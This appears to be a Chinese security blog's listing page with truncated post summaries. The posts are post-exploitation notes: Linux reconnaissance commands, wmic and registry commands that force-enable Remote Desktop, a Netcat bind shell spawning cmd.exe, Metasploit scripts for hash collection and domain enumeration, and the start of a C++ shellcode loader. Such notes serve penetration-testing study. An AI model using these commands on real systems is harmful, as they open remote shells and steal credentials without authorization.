摘要:
linux信息收集 探测linux是什么发行版本 lsb_release -a cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release 查询是否存在打印机 lpstat 阅读全文
posted @ 2023-11-08 14:37
江城子!
阅读(91)
评论(0)
推荐(0)
摘要:
windows快捷指令 强开3389 wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 cmd强开3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Contro 阅读全文
posted @ 2023-11-08 14:28
江城子!
阅读(343)
评论(0)
推荐(0)
摘要:
Netcat反弹shell 一:正向代理 Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军&刀 windows机器 nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe linux机器 nc -lvvp 1111 -e /bin/ 阅读全文
posted @ 2023-11-08 14:28
江城子!
阅读(67)
评论(0)
推荐(0)
摘要:
常用msf插件 run arp_scanner -r 192.168.183.1/24 # 利用arp进行存活主机扫描 run winenum # 自动化执行一些检测脚本 run credcollect # 获取用户hash run domain_list_gen # 获取域管理账户列表 run p 阅读全文
posted @ 2023-11-08 14:28
江城子!
阅读(625)
评论(0)
推荐(0)
摘要:
基本的C++shell code加载器 #include <iostream> #include <windows.h> // 定义要执行的shellcode unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90"; // 这里填入您的shell 阅读全文
posted @ 2023-11-08 14:23
江城子!
阅读(189)
评论(0)
推荐(0)

浙公网安备 33010602011771号